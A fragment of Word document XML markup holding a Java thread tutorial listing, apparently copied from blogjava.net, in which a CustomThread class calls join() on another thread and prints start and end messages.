          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="433" name="图片 21"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println(threadName + " end.");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20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="434" name="Codehighlighter1_611_700_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_611_700_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (Exception e) {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21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="435" name="图片 23"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println("Exception from " + threadName + ".run");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22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="436" name="图片 24" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="437" name="图片 25" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="438" name="图片 26" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"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lastRenderedPageBreak/>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="439" name="Codehighlighter1_753_1287_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/Expanded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highlighter1_753_1287_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> CustomThread </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Thread {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26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="440" name="图片 28"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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CustomThread1 t1;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27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="441" name="Codehighlighter1_825_902_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_825_902_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> CustomThread(CustomThread1 t1) {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28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="442" name="图片 30"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>("[CustomThread] Thread");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29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="443" name="图片 31"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.t1 = t1;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30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="444" name="图片 32" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="445" name="Codehighlighter1_929_1282_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_929_1282_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> run() {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32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="446" name="图片 34"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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String threadName = Thread.currentThread().getName();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33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="447" name="图片 35"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println(threadName + " start.");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34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="448" name="Codehighlighter1_1066_1162_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_1066_1162_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> {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35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="449" name="图片 37"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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t1.join();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36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="450" name="图片 38"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println(threadName + " end.");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37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="451" name="Codehighlighter1_1184_1273_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_1184_1273_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (Exception e) {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38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="452" name="图片 40"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println("Exception from " + threadName + ".run");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39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="453" name="图片 41" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="454" name="图片 42" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="455" name="图片 43" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"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42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="456" name="Codehighlighter1_1318_1904_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/Expanded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highlighter1_1318_1904_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
